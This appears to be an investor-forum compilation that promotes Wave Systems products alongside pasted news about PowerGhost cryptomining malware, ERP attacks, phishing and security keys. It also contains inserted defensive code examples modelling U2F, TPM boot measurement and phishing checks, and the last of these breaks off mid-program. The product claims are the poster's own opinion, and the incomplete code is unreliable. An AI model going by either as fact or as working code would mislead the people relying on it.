If antivirus software doesn’t work, what does? The Wave alternative relies not on superficial layers of software but on standards-based hardware: self-encrypting drives (SEDs) and Trusted Platform Modules (TPMs), or security chips, that are already embedded in many of your computers and mobile devices. This hardware provides you with secure storage. When you turn the SED and TPM on and manage them with Wave, you suddenly have a broad, deep view into your network. Among other things, you’ll know immediately whether any one of your devices—computers, laptops, tablets, smartphones—has been tampered with. But Wave is proactive too: you can block the kinds of behaviors that invite malware in. Wave's Endpoint Monitor provides early detection for these low-lying sneaky attacks.
This new cryptomining malware targets business PCs and servers
https://www.zdnet.com/article/this-new-cryptomining-malware-targets-business-pcs-and-servers/
Researchers have uncovered a cryptojacking campaign that looks to spread across infected networks to ensure as much mining profit as possible.
A new form of cryptocurrency-mining malware is targeting corporate networks across the world, employing a combination of PowerShell and EternalBlue to stealthily spread.
Dubbed PowerGhost, the fileless malware can secretly embed itself on a single system on a network then spread to other PCs and servers across organisations.
The cryptojacker has been uncovered by researchers at security company Kaspersky Lab, who detected it on corporate networks across the globe, with the largest concentration of infections in India, Brazil, Colombia, and Turkey. PowerGhost has also been detected across Europe and North America.
Cryptocurrency mining malware secretly uses the power of infected systems to mine for cryptocurrency, which is sent to the attackers' wallet. The more machines that are infected, the more illicit profits the attackers can make.
Infections begin with the use of exploits or remote administration tools such as Windows Management Instrumentation. PowerGhost also uses fileless techniques to discreetly go about its business and ensure it isn't detected on the network.
By adopting this tactic, the PowerGhost miner isn't stored directly on the hard drive of the infected machine, making it harder to detect.
PowerGhost itself is an obfuscated PowerShell script which contains add-on modules for the miner's operation such as mimikatz, which helps it obtain account credentials of infected machines, as well as a shellcode for deploying the notorious EternalBlue exploit to spread around the network.
EternalBlue is the leaked NSA hacking tool which went on to power the WannaCry and NotPetya attacks, and it's still being used by crooks over a year later.
After one machine is infected with PowerGhost, EternalBlue can spread it around the rest of the network, then with the aid of mimikatz it can steal credentials, aiding its spread and allowing the escalation of privileges using CVE-2018-8120.
Once PowerGhost is embedded onto machines, it can perform its task of mining for cryptocurrency -- and detection rates for the malware suggest that those behind it are particularly keen to compromise corporate networks in order to make as much money as quickly as possible.
"PowerGhost raises new concerns about crypto-mining software. The miner we examined indicates that targeting consumers is not enough for cybercriminals anymore - threat actors are now turning their attention to enterprises too. Crypto-currency mining is set to become a huge threat to the business community," said David Emm, principal security researcher at Kaspersky Lab.
Researchers note that one version of PowerGhost can also be used for conducting DDoS attacks, something which those behind the malware are likely to be using as an additional means of income.
Cryptocurrency mining malware has risen to become one of the most popular means of cybercriminals making money, even surpassing ransomware when it comes to turning a profit.
To avoid corporate networks falling victim to mining malware, researchers recommend software is kept patched and up to date in order to prevent miners exploiting known vulnerabilities like EternalBlue.
Organisations are also urged to not overlook less obvious targets for attacks such as queue management systems, POS terminals, and vending machines, because cryptojackers don't need much power to operate, so can easily take advantage of these often-forgotten about, low-powered systems.
https://www.wavesys.com/products/wave-endpoint-monitor
Detect attacks before it’s too late
Malware can do its work for weeks or months before you ever know it’s there. But with Wave Endpoint Monitor, you can spot malware before it has a chance to cause damage.
Antivirus software can’t detect rootkits and other malware; it works at the level of the OS and isn’t very good at seeing deeper into the system. For example, it can’t tell whether the boot record is lying. The Wave alternative is to work with the Trusted Platform Modules (TPMs), or security chips, embedded in your devices. By using the TPM to attest to the security of the device each time that device boots, Wave looks below the operating system and can help detect threats lurking there. Every time a device boots up, Wave Endpoint Monitor makes a comparison against previous boot values, and if anything deviates from the norm, it alerts you immediately.
An open standard means Wave works with everything
Wave Endpoint Monitor works on your existing hardware, across platforms. That’s because our solutions are based on an open standard that’s already been implemented on many laptops and is now working its way onto mobile devices. We’re talking about those TPMs. We just don’t think that expensive new equipment and vendor lock-in are great selling points.
Be proactive on compliance
No new regulations here—yet. But government agencies recognize malware as a growing threat. In 2011, NIST published guidelines for basic input/output system (BIOS) integrity measurement, the BIOS being what initializes a computer when it boots up. When this critical system is malware’s target, the consequences are big. The guidelines describe what’s needed to establish a chain of trust for the BIOS: Has it been tampered with? NIST actually looked to Wave for feedback on this document (see the acknowledgments). We know what’s needed, because Wave Endpoint Monitor is already doing it.
=============================================================
In reference to mimikatz and stealing credentials in the article: Wave VSC 2.0 could help in that situation.
https://www.wavesys.com/products/wave-virtual-smart-card
Microsoft acknowledges price increases coming for Office 2019 and Windows 10 Enterprise users
Given the cost, the cost increases for Windows 10 and Office 2019, and the cost-effective/better cybersecurity available from Wave Systems, companies may want to upgrade to Windows 10 and Office 2019 further in the future and use Wave Systems' products now.
https://www.zdnet.com/article/microsoft-acknowledges-price-increases-coming-for-office-2019-and-windows-10-enterprise-users/
Microsoft will be making some pricing and naming changes as of its October 2018 price list that will affect some Windows 10 and Office 2019 customers. Here's what's in store.
Microsoft has price increases in store for some of its Office and Windows customers as of October 1, 2018
In a July 25 blog post, Microsoft officials acknowledged the coming increases.
Office 2019, the next on-premises version of Office clients and servers which Microsoft is currently testing ahead of its launch later this year, will see increases of 10 percent over current on-premises pricing. This price increase is for commercial (business) customers and will affect Office client, Enterprise Client Access License (CAL), Core CAL and server products, officials said.
Microsoft also is rejiggering how it refers to Windows 10 Enterprise E3 and related pricing.
As of October, Microsoft will be using the E3 name for the per-user version (not the per-device one). Windows 10 Enterprise E3 per User will be rechristened "Windows 10 Enterprise E3." And the current Windows 10 Enterprise E3 per Device will be renamed "Windows 10 Enterprise."
According to Microsoft's blog post, the price of Windows 10 Enterprise will be raised to match the price of Windows 10 Enterprise E3. Windows 10 Enterprise E3 costs $84 per user per year. Microsoft also is discontinuing Windows 10 Enterprise E5 per device as of October 1, 2018. Only the per user version will remain, which costs $14 per user per month, or $168 per user per year.
Based on Microsoft's blog post, I don't think the naming of Microsoft 365 Enterprise E3 or E5 will be impacted. I've asked if there will be any price increases; no word back yet. Update: A company spokesperson said the company had no comment on whether this means price increases for Microsoft 365.
Microsoft originally introduced Windows 10 Enterprise subscription plans (E3 and E5) at its worldwide partner conference in 2016. Microsoft's plan then was to use these subscription bundles to try to win over more small-and-midsize (SMB) customers.
Microsoft officials said in today's blog post that the changes are meant to create more consistency and transparency across purchasing channels. Other changes that will be on the October price list:
•Establishment of a single, consistent starting price across all programs aligned to web direct for online services (OLS)
•Removal of the programmatic volume discounts (Level A and Open Level C) in Enterprise Agreement (EA)/EA Subscription, MPSA, Select/ Select Plus, and Open programs (Open, Open Value, Open Value Subscription)
•Alignment of government pricing for on-premises and online services to the lowest commercial price in EA/EAS, MPSA, Select Plus, and Open Programs
•Delivery of a newly designed Customer Price Sheet that better outlines how a customer's price was derived (direct EA/EAS only)
Microsoft told its reseller partners at its recent Inspire partner conference that it was moving toward the goal of providing "one consistent set of offers, supported by a Modern Commerce platform" in this coming fiscal year. (New buzzword of the year nomination by me: Modern!)
By updating discounting policies meant to sell software at scale, Microsoft officials said they will no longer be "incentivizing them (customers) to standardize unnecessarily on software."
ERP security warning as hackers step up attacks on systems
If SAP or Oracle is an application used within Wave VSC 2.0 and Wave Endpoint Monitor is used to protect the computer from malware, SAP and Oracle users could be much better protected while all of these flaws are in transition to be updated or the software is upgraded (probably not a cheap proposition). imo.
https://www.zdnet.com/article/erp-security-warning-as-hackers-step-up-attacks-on-systems/
Vulnerable ERP applications are being increasingly targeted by attackers
The US Department of Homeland Security has warned businesses of the growing risk of attackers targeting enterprise resource planning (ERP) systems.
An alert posted by the United States Computer Emergency Readiness Team (US-CERT) warned that attackers are seeking to exploit vulnerabilities in ERP systems to access sensitive information.
ERP systems make an appealing target for hackers, as they run business-critical processes and house sensitive corporate information, which can be used for cyber espionage, sabotage, and fraud.
In some cases, systems are left exposed, with thousands of ERP applications directly connected to the internet, providing a tempting -- and lucrative -- target for attackers.
The US-CERT alert follows the release of a joint report by security firms Digital Shadows and Onapsis into the threats hackers pose to ERP systems.
While companies like SAP and Oracle issue patches for their ERP products, customers can struggle to apply them due to complex system architectures, customised functionality, or even lack of knowledge about the patching process. These difficulties can then be exploited by attackers.
"You've got the real holy grail, which is the remote code execution exploits, then if that's combined with an internet-facing application, that's really sought after," Mike Marriott, security analyst at Digital Shadows, told ZDNet.
ERP systems can be more vulnerable to attack if the applications they support are connected to the internet. Researchers identified more than 17,000 SAP and Oracle ERP applications connected to the internet, many of which belonged to large commercial and government organisations in the US, UK, and Germany.
"There are lots of internet-facing SAP and Oracle applications that are quite easy to find through Google Dorks, then lots of exploitable vulnerabilities available online with remote code execution," said Marriott.
Many of these exposed applications are vulnerable to attack and information about those at risk is shared on the dark web and in criminal forums. According to the report, there's been a 160 percent increase in the activity and interest in ERP-specific vulnerabilities from 2016 to 2017.
One way that attackers are exploiting vulnerabilities in ERP infrastructure is by using them to infect corporate networks with malware.
The latest incarnation of a common banking trojan malware Dridex has the ability to target SAP systems. Once installed on a system, this version of Dridex seeks out users of SAP software and harvests their credentials, along with sensitive business data.
But it isn't just criminals targeting these systems -- the report warns that nation-state sponsored attackers are targeting ERP applications for cyber espionage and sabotage.
Perhaps the most infamous example of this is the breach at the United States Information Service (USIS), which at the time was the biggest commercial provider of background information to the US federal government.
The attack, later found to be the work of state-sponsored Chinese hackers, began with an exploited SAP vulnerability and resulted in the exposure of thousands of sensitive records.
The Digital Shadows report warns that nation-state attackers continue to use ERP vulnerabilities as backdoors into systems.
"These attacks are under-reported and that can lead people to have to take the security of these applications less seriously than they should," said Marriott.
"People have to face up to how these applications hold really sensitive information, there are a lot of vulnerabilities, a lot of them are still internet facing and criminals are making use of this. So make sure you're patching regularly and not using default passwords."
Google Employees' Secret to Never Getting Phished Is Using Physical Security Keys
See the link at the end of the article for reasons it could be a better idea to get Wave VSC 2.0 than to use the keys Google has selected for its multifactor authentication. One other reason not mentioned in the link is the environmental implications of all the shipping, the devices themselves, and where the shipping packaging ends up. Wave VSC 2.0 doesn't have a negative environmental impact like Yubikey and RSA Securid and the product is better overall. imo.
https://gizmodo.com/google-employees-secret-to-never-getting-phished-is-usi-1827833717
If you’ve been hacked in recent years, odds are you fell for that perfectly crafted phishing message in your email. Even the most mindful individuals can slip up, but Google’s employees have reportedly had a flawless security record for more than a year thanks to a recent policy requiring them to use physical security keys.
Krebs on Security reports that in early 2017, Google started requiring its 85,000 employees to use a security key device to handle two-factor authentication when logging into their various accounts. Rather than just having a single password, or receiving a secondary access code via text message (or an app such as Google Authenticator), the employees had to use a traditional password as well as plug in a device that only they possessed. The results were stellar. From the report:
A Google spokesperson said Security Keys now form the basis of all account access at Google.
“We have had no reported or confirmed account takeovers since implementing security keys at Google,” the spokesperson said. “Users might be asked to authenticate using their security key for many different apps/reasons. It all depends on the sensitivity of the app and the risk of the user at that point in time.”
A Google spokesperson confirmed that statement when reached by Gizmodo.
Obviously, Google employees are a prime target for hackers. Even successfully phishing a low-level worker can provide just enough access to get into sensitive systems or provide a jumping off point to target an employee with deeper access. So, when Google says it weathered perhaps thousands of attacks over a year without any known incident, it’s worth perking up and paying attention.
You probably already use two-factor authentication for at least some of your accounts, and if not you certainly should. The idea is that an extra step has to be taken by anyone trying to access an account. For example, if you just had to click that shady link in your inbox and accidentally handed over your Gmail password to a hacker, they’d still need to get the code from a text message or authenticator app to get in to your account. Before implementing the physical security key requirement, Google employees used Google Authenticator for that second layer of protection.
Last year, the company took things a step further with Universal 2nd Factor Authentication (U2F) via a device like the popular USB YubiKey. Even those text message codes sent to your phone can be hijacked by a determined hacker, but a Security Key has to be physically inserted into the machine you’re using. If a hacker really wanted to get into your files, they’d have to get their hands on the device itself.
Until we figure out a better alternative to passwords, U2F is one of the best options to protect yourself. Unfortunately, it isn’t available everywhere. It just so happens to work in Google’s Chrome browser, so there’s the good PR angle. But it can also be manually configured in Firefox. It can be used for apps like Facebook and password managers like LastPass, as well.
Yubico and Feitian are both trusted manufacturers of security key hardware if you’re looking to start using U2F in your day-to-day life. You can read more about getting everything set up right here.
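Why a security key resists the phishing described above, as an added example that is not code from the article, Google or any key vendor: a stripped-down model of the U2F sign step in which the browser (not the page) writes the origin into the signed client data, so a challenge relayed through a look-alike site is rejected by the real service. The origins, challenges and device secret are constructed, and an HMAC stands in for the real key's ECDSA signature so the example runs with the standard library only.

```python
"""
Constructed model of U2F authentication (not a real implementation).
A real key holds an ECDSA key pair and the relying party keeps the public
key; here HMAC over the same signed data with a per-device secret plays
that role so the logic can be exercised offline.
"""
import hashlib
import hmac
import json
import secrets
from typing import Optional


def signed_payload(app_id: str, counter: int, client_data: bytes) -> bytes:
    """U2F signs SHA-256(appId) || counter || SHA-256(clientData)."""
    app_param = hashlib.sha256(app_id.encode("utf-8")).digest()
    challenge_param = hashlib.sha256(client_data).digest()
    return app_param + counter.to_bytes(4, "big") + challenge_param


class SecurityKey:
    """Stand-in for the physical token; its secret never leaves the device."""

    def __init__(self) -> None:
        self._secret = secrets.token_bytes(32)  # constructed device secret
        self.counter = 0

    def sign(self, app_id: str, client_data: bytes) -> dict:
        """Produce an authentication response for the given app ID and client data."""
        self.counter += 1
        sig = hmac.new(self._secret, signed_payload(app_id, self.counter, client_data),
                       hashlib.sha256).digest()
        return {"counter": self.counter, "client_data": client_data, "signature": sig}

    def registered_verifier(self) -> bytes:
        """What the relying party stored at registration (stand-in for the public key)."""
        return self._secret


class RelyingParty:
    """The real service: issues challenges and checks responses."""

    def __init__(self, app_id: str, registered_verifier: bytes) -> None:
        self.app_id = app_id
        self._verifier = registered_verifier
        self.last_counter = 0
        self.pending: Optional[str] = None

    def new_challenge(self) -> str:
        self.pending = secrets.token_urlsafe(32)
        return self.pending

    def verify(self, response: dict) -> bool:
        data = json.loads(response["client_data"])
        # Origin binding: the browser fills in the page origin, so a phishing
        # page cannot present a response that claims the real origin.
        if data.get("origin") != self.app_id:
            return False
        if data.get("challenge") != self.pending:
            return False
        if response["counter"] <= self.last_counter:
            return False  # replayed or cloned-key response
        expected = hmac.new(self._verifier,
                            signed_payload(self.app_id, response["counter"], response["client_data"]),
                            hashlib.sha256).digest()
        if not hmac.compare_digest(expected, response["signature"]):
            return False  # client data was edited after signing
        self.last_counter = response["counter"]
        self.pending = None
        return True


def browser_client_data(origin: str, challenge: str) -> bytes:
    """The browser, not the web page, assembles client data with the true origin."""
    return json.dumps({"typ": "navigator.id.getAssertion", "challenge": challenge,
                       "origin": origin}, sort_keys=True).encode("utf-8")


def legitimate_login(key: SecurityKey, rp: RelyingParty) -> bool:
    challenge = rp.new_challenge()
    return rp.verify(key.sign(rp.app_id, browser_client_data(rp.app_id, challenge)))


def phished_login(key: SecurityKey, rp: RelyingParty, phishing_origin: str) -> bool:
    """A look-alike site relays the real challenge to the victim, who touches the key.
    Browsers also refuse app IDs that do not match the page origin; this shows the
    relying party's own check, which fails even if that first check were bypassed."""
    challenge = rp.new_challenge()
    return rp.verify(key.sign(rp.app_id, browser_client_data(phishing_origin, challenge)))


if __name__ == "__main__":
    key = SecurityKey()
    rp = RelyingParty("https://accounts.example", key.registered_verifier())
    print("legitimate:", legitimate_login(key, rp))
    print("phished:   ", phished_login(key, rp, "https://accounts-example.evil"))
```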
https://www.wavesys.com/products/wave-virtual-smart-card
Get better security at less than half the cost
Passwords are weak. Tokens are expensive. Don’t compromise on security or price.
Wave Virtual Smart Card does anything your physical smart cards and tokens do, but it starts with hardware you already have: the Trusted Platform Module (TPM), a hardware security chip built into the motherboard of most business-class PCs. You may not even know you have it, but once you do, the TPM can be used in a myriad of ways. Wave turns it into a smart card, embedded directly into your laptop.
What can it be used for?
What do you use your smart card for today? With the exception of keying open the door at work, Wave Virtual Smart Card can perform any of the services or applications you rely on your smart card for today. Secure VPN, WiFi, remote desktop, cloud applications – it can all be done with a virtual smart card.
One helpdesk call you'll never get: "I lost my virtual smart card again..."
There are so many ways to lose a token – couch cushions, street drains, curious toddlers. In fact, up to 30% of all tokens are eventually lost. It’s much harder to lose a laptop, and you notice a lot faster when you do.
The user experience with a virtual smart card is simple: he or she logs in with a PIN (authentication factor number one). The TPM (authentication factor number two) then transparently identifies the device to the network and connects the user to all the approved services. It’s one less thing for users to carry around.
What will you do with >50% TCO savings?*
Tokens and smart cards require an additional hardware purchase, plus the time and money to ship to remote users. Use something that’s already in the users’ hands (the TPM), and your acquisition and deployment costs are lower.
Then consider the management savings in not having to replace lost and stolen tokens. That means fewer helpdesk calls, less interruption of user productivity, and fewer acquisition and shipping costs.
When we say “secure”…
…we mean it. Our solution starts with a proven hardware root-of-trust. Multi-factor authentication is an established best-practice for strong authentication: the TPM-based virtual smart card is one factor (something you have) and the user PIN is a second factor (something you know).
================================================================
The Google security keys can be lost and if the backup plan has any security deficiencies, hackers can exploit that.
What Can You do With the Trusted Platform Module (TPM)?
https://trustedcomputinggroup.org/what-can-you-do-with-the-trusted-platform-module-tpm/
Another article, "Watch a Hacker Install a Firmware Backdoor on a Laptop in Less than 5 minutes", requires a subscription from Motherboard (interesting article). The TCG article mentions that computers with Windows 8 and secure boot turned on are less susceptible to an "evil maid attack." I believe also that evil maid attacks can be thwarted by computers with SEDs. imo.
Much has been made about what exactly can be accomplished with the Trusted Platform Module, or TPM. Now that Windows 8 is available, that question becomes easy: lots can be done with the TPM to ensure better system, data and network security.
One key use is authentication – a topic that is seeing lots of interest these days with recent moves by Apple, Google and others to implement stronger authentication.
At last month’s RSA conference, TCG member Wave Systems showed effective strong authentication using the embedded TPM and Windows 8.
With Windows 8 a new environment for security solution providers to utilize for PBA has arrived: UEFI. The Unified Extensible Firmware Interface (UEFI) is a specification that defines a software interface between an operating system and platform firmware. UEFI is meant as a replacement for the Basic Input/Output System (BIOS) firmware interface, present in all Windows-based personal computers.* When UEFI Secure Boot is turned on it means that the PBA software has to be ‘signed’ by Microsoft or the OEM so that it can be trusted to execute. With Secure Boot turned on computers are less susceptible to attacks on the booting process such as the Evil Maid attack.
The TPM also can be used to monitor the security and health of the PC boot environment. For example, Wave Endpoint Monitor (WEM) determines the health of the endpoint based on TPM-secured Platform Configuration Register (PCR) measurements. In this demo, a “healthy” laptop is granted access to Wave Cloud. When WEM detects a suspicious change on the laptop – for example, by a firmware virus – the laptop is denied access to Wave Cloud.
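The boot-health check described in the Wave Endpoint Monitor pages above and in this demo, as an added example that is not Wave's code: boot components are measured into TPM Platform Configuration Registers with the extend operation, the resulting values are compared with a baseline from an earlier trusted boot, and any deviation becomes an alert and an access decision. The component names, PCR assignments and digests are constructed for illustration.

```python
"""
Constructed model of PCR-based boot measurement comparison (not Wave's code).
"""
import hashlib
from typing import Dict, List, Tuple

PCR_SIZE = 32                    # SHA-256 PCR bank
PCR_RESET = b"\x00" * PCR_SIZE   # PCRs hold all-zero bytes after reset

EventLog = List[Tuple[int, bytes]]  # ordered (pcr_index, digest) records


def extend(pcr: bytes, digest: bytes) -> bytes:
    """TPM PCR extend: PCR_new = SHA-256(PCR_old || digest).
    One-way and order-dependent, so a PCR commits to the whole measurement sequence."""
    return hashlib.sha256(pcr + digest).digest()


def replay_event_log(events: EventLog) -> Dict[int, bytes]:
    """Recompute every PCR from the boot event log, as a verifier does when it
    checks that the log explains the PCR values the TPM reports."""
    pcrs: Dict[int, bytes] = {}
    for index, digest in events:
        pcrs[index] = extend(pcrs.get(index, PCR_RESET), digest)
    return pcrs


def changed_pcrs(current: Dict[int, bytes], baseline: Dict[int, bytes]) -> List[int]:
    """PCR indices whose current value differs from the stored baseline.
    A PCR present in the baseline but missing now also counts as changed."""
    return sorted(i for i in baseline if current.get(i) != baseline[i])


def access_decision(current: Dict[int, bytes],
                    baseline: Dict[int, bytes]) -> Tuple[bool, List[int]]:
    """Grant access only when every baselined PCR matches; otherwise report which
    registers moved so an analyst knows where in the boot chain to look."""
    changed = changed_pcrs(current, baseline)
    return (not changed, changed)


def measure(component: str) -> bytes:
    """Stand-in for the digest of a boot component's code (constructed)."""
    return hashlib.sha256(component.encode("utf-8")).digest()


# Constructed boot event log of a known-good machine. PCR assignments follow the
# common convention: 0 firmware code, 2 option ROMs, 4 boot manager, 7 Secure Boot policy.
GOOD_BOOT: EventLog = [
    (0, measure("platform-firmware 1.2.3")),
    (0, measure("firmware-settings")),
    (2, measure("nic-option-rom 7")),
    (4, measure("bootmgfw.efi (signed)")),
    (7, measure("secure-boot: enabled")),
]

# Same machine after its firmware image has been altered (constructed).
TAMPERED_FIRMWARE: EventLog = [(0, measure("platform-firmware 1.2.3 + implant"))] + GOOD_BOOT[1:]

# Same components, but the two firmware measurements arrive in a different order.
REORDERED_BOOT: EventLog = [GOOD_BOOT[1], GOOD_BOOT[0]] + GOOD_BOOT[2:]

# Baseline captured at an earlier, trusted boot.
BASELINE = replay_event_log(GOOD_BOOT)


if __name__ == "__main__":
    for name, log in [("good boot", GOOD_BOOT), ("tampered firmware", TAMPERED_FIRMWARE),
                      ("reordered log", REORDERED_BOOT)]:
        ok, moved = access_decision(replay_event_log(log), BASELINE)
        print(f"{name:18s} access={'granted' if ok else 'denied'} changed PCRs={moved}")
```

The reordered case is why a verifier replays the log rather than comparing digests as a set: the same components measured in a different sequence yield a different PCR value.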
Great, Now Facebook Is Investigating Potential Data Misuse by Something Called 'Crimson Hexagon'
Wave's Scrambls could have benefited Facebook and Twitter users in a big way. It could be a great tool for Facebook and Twitter users to 'scrambl' posts for the public that is not part of their inner circle. imo.
https://gizmodo.com/great-now-facebook-is-investigating-potential-data-mis-1827773950
Facebook may have stumbled through its Cambridge Analytica user privacy scandal largely unscathed so far—the yet-to-be-determined outcome of four separate federal investigations notwithstanding—but its pivot to publicly talking a big game on cracking down on data misuse continues.
Now Facebook has suspended another data analysis firm that received user data, this time with a name that sounds suspiciously like an evil corporation from a 1980s-era Kurt Russell movie: Crimson Hexagon. According to the Wall Street Journal, the company has secured at least 22 separate federal contracts since 2014 worth more than $800,000, including for the State Department, the Federal Emergency Management Agency, and the Secret Service, as well as a separate contract with a Russian nonprofit called the Civil Society Development Foundation.
Crimson Hexagon aggregates large amounts of public posts from sites like Facebook and Twitter for purposes like measuring public sentiment around a range of issues, and according to the WSJ, claims to have assembled a trillion-post archive. For example, the paper reported it attempted (but failed) to procure a Defense Department contract monitoring the terror group ISIS online. Its Russian contract was to measure the popularity of Vladimir Putin; another contract in Turkey informed the Recep Tayyip Erdogan-led government’s “decision in 2014 to briefly shut down Twitter amid public dissent,” the WSJ wrote, citing sources familiar with the company.
While the WSJ wrote Facebook is suspending the Boston-based company while it determines whether the government contracts violated its terms, it is not currently believed the firm gained access to private data like Cambridge Analytica:
Crimson Hexagon operates with little oversight from Facebook once it pulls public data from the social-media platform, according to more than a dozen people familiar with the business. The government contracts weren’t approved by Facebook in advance, for example, the people said.
Facebook, in response to questions from The Wall Street Journal this week about its oversight of Crimson Hexagon’s government contracts and storing of user data, said Friday it wasn’t aware of some of the contracts. On Friday, it said it was suspending Crimson Hexagon’s apps from Facebook and its Instagram unit, and launching a broad inquiry into how Crimson Hexagon collects, shares and stores user data.
Also concerning is a 2016 incident in which Crimson Hexagon suddenly began receiving private Instagram posts while downloading public Facebook ones “because of what Crimson Hexagon employees assumed was a software glitch on Facebook’s part”—something that certainly sounds like a major screwup.
Twitter also worked with Crimson Hexagon, the paper wrote. Unlike with Facebook, where data is freely provided to developers, the company paid Twitter for direct access to its “fire hose,” a premium version of its API that guarantees access to all tweets matching specific criteria. That means Crimson Hexagon gets more useful data from Twitter than Facebook, the WSJ added, but Twitter reportedly killed a potential contract with Immigration and Customs Enforcement over concerns on how the data might be used.
Facebook banned the use of its data for government surveillance in March 2017, per the BBC, though Crimson Hexagon’s other deals have included work with Adidas, Samsung, and the BBC itself.
“We don’t allow developers to build surveillance tools using information from Facebook or Instagram,” a Facebook spokesperson told CNN Money. “We take these allegations seriously, and we have suspended these apps while we investigate.”
In a blog post, Crimson Hexagon’s Chris Bingham emphasized that the company only pulls public posts, that government contracts are a minority of its work, that it only uses the data for purposes allowed by platforms, and “under no circumstances is surveillance a permitted use case.”
As noted by TechCrunch, unlike Cambridge Analytica, which worked to obfuscate its connection to a shady network of other companies and allegedly hired foreign contractors to work on US elections in what was possibly an illegal scheme, “Crimson Hexagon is more above the board, with ordinary venture investment and partnerships.”
Mysterious malware campaign targets just 13 iPhones in India
Can there be any doubt that this has occurred or will occur on Android phones as well? Wave Endpoint Monitor could potentially help out in this situation. imo. See previous post below.
https://investorshub.advfn.com/boards/read_msg.aspx?message_id=142196498
https://www.cyberscoop.com/mysterious-malware-campaign-targets-just-13-iphones-india/
An application-warping malware campaign in India is aimed at just 13 iPhones in what researchers are calling a “highly targeted” operation.
The attackers are using an open-source mobile device management (MDM) server to distribute the malware through popular apps like Telegram and WhatsApp, researchers from Talos, Cisco’s threat intelligence unit, revealed Thursday. The use of MDM, a popular enterprise tool for administering mobile apps, allows hackers to control how their malware is interacting with the target phones.
“This campaign is of note since the malware goes to great lengths to replace specific mobile apps for data interception,” researchers Warren Mercer, Paul Rascagneres, and Andrew Williams wrote in a blog post.
The researchers don’t know who was targeted in the campaign, who carried out the attack, or why. While the hackers apparently tried to plant a “false flag” by posing as Russian, evidence suggests they were operating in India, according to Talos.
The malicious code injected into the apps can collect and exfiltrate phone and serial numbers, location, contacts, and Telegram and WhatsApp messages. The iPhone users are likely lured into enrolling in the MDM service through a social engineering campaign, according to the researchers. Each step of the enrollment process requires interacting with the user, such as installing a certificate authority on the iPhone.
Apple has revoked 5 certificates linked with the campaign, according to the researchers.
“The likely use of social engineering to recruit devices serves as a reminder that users need to be wary of clicking on unsolicited links and verify identities and legitimacy of requests to access devices,” they wrote.
The growing use of MDM at large organizations means users need to understand that installing additional certificates on devices can expose them to malicious activity, the researchers advised. “By installing a certificate outside of the Apple iOS trusted certificate chain, you may open up to possible third-party attacks like this,” they added.
It’s an open question as to why the malware, which the researchers say has been in use since August 2015, has gone after just 13 iPhones. Asked about this, a Talos spokesperson said that, for now, the researchers won’t be offering additional information beyond the blog post.
“Over a three-year period, the attackers remained under the radar — likely due to the low number of compromised devices,” the blog post states.
Pay-n-pray cybersecurity isn’t working. What if we just paid when it works?
https://www.digitaltrends.com/computing/bounty-based-cybersecurity-safety/
Not allowing bad guys on the network (see end of post) compared to the norm could be a relief to companies constantly having to put out fires (and potentially miss some) and be proof that Wave's TPM/ERAS product 'performs as designed'. Other Wave products perform better than competitors in the industry and this article discusses pay for performance, which seems to be one of Wave's stronger suits. imo. This could change the way companies buy cybersecurity products. With companies spending billions of dollars on cybersecurity, isn't it time they find solutions that work, like Wave Systems' products!
Like home security, people would often rather not think about cybersecurity once they’ve paid for it. They’d rather pay and pray.
But how do you know when a security company’s software is working? With all the billions of dollars poured into protecting ourselves and our businesses online, why do hacks seem to be increasing in regularity and damages?
We spoke with Oren J. Falkowitz, a former senior-level employee at the NSA and United States Cyber Command, who has a radical idea for how cybersecurity companies should be making their money.
The problem
Our modern cybersecurity fiasco has many causes. Maybe it’s a lack of government funding and regulation. Maybe it’s large tech corporations not caring enough about privacy. Maybe it’s just a matter of educating the public and explaining in simple terms what’s at stake.
Falkowitz has a different take. He believes the real problem is that cybersecurity profits aren’t tied to performance. “For us, it means performance-based cybersecurity and paying for results, not a failure,” he told Digital Trends. “Companies should pay for cybersecurity only when and if it performs as designed.”
That’s not how it works today. Cybersecurity experts, companies, and antivirus software are presented and purchased like an insurance plan. You pay monthly and hope that nothing bad happens. If it does, they’ll help you pick up the pieces — and maybe try to upsell you on more security.
Area 1 Security, Falkowitz's own cybersecurity company, takes the opposite approach. Area 1 calls out the fact that people "commit to security contracts running three to five years, spending six or seven figures. But they still don't get what they pay for." Falkowitz believes clients should pay only for attempted crimes that are stopped. It's an idea similar to bug bounty programs, which encourage hackers to find – and then disclose – vulnerabilities.
“Companies spend about $93 billion on cybersecurity, with no end in sight, and what’s worse, no end to the severity or frequency of cyber attacks,” Falkowitz said. “Performance-based and accountable cybersecurity will ensure that results are what drive the future innovations and successful outcomes in business models.”
You might wonder how a company could stay in business if it constantly had to prove to customers that attacks are being stopped. Area 1 Security makes it work by focusing its efforts on a particular aspect of cybersecurity — phishing.
It all leads back to phishing
“Phishing is the attack that starts the attack, it’s the root cause for an astounding 95 percent of all damages,” said Falkowitz. “The key to performance-based cybersecurity is stopping phishing.”
Phishing has become the bane of the internet’s existence. From malware to stolen data, phishing is often the entry point for the worst cyberattacks we’ve seen. It usually takes the form of a fraudulent email, sent to an unsuspecting victim under the guise of an official company or organization.
The email will then prompt the reader to click a link — and once they do, the attacker’s trap is triggered. Though simple, hackers have used phishing for everything from the Clinton campaign email debacle to the devastating 2017 WannaCry ransomware attack.
“Phishing is a socially-engineered attack that relies on authenticity to evade detection,” Falkowitz explained. “It’s designed not to be caught by anyone! That’s why it works so well. Besides being effective, it’s also incredibly cheap. That’s part of why it’s so good economically to be a bad guy on the internet. If you’re an attacker and you have something that works, that most companies can’t defend against, why not keep using it?”
Area 1 Security’s system claims to stop 99.99 percent of all phishing attacks, allowing them to keep a log of the attacks they’re preventing. Its philosophy isn’t to hunt down the criminals across the internet, but instead to stop the ones who are already knocking at our doors.
“Until we take phishing as a weapon out of the hands of attackers, we’ll continue on this increasingly dangerous and expensive trajectory.”
Maybe it’s time we started asking more from the companies that claim to protect us. After all, disarming the bad guys sounds like a much better plan than waiting for them to attack.
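The article describes the shape of a phishing mail (a message posing as an official company, carrying a link the reader is meant to click) but not what a defender can check for. As an added illustration that is not Area 1's product logic or the article's code, the following Go program runs three cheap mail-gateway checks over a few constructed messages: a display name that claims a brand the sending domain is not allowed to speak for, a sender domain that imitates the brand's real domain by character swaps, and visible link text whose host differs from the real href. The brand table and the sample messages are constructed for the demo.

```go
// Constructed mail-gateway checks for look-alike "official" phishing mail; not Area 1's code.
package main

import (
	"fmt"
	"net/url"
	"sort"
	"strings"
)

// brandDomains: which sender domains may legitimately speak for a brand named in a display name.
// Constructed table; a real gateway would load it from configuration.
var brandDomains = map[string][]string{
	"paypal":    {"paypal.com"},
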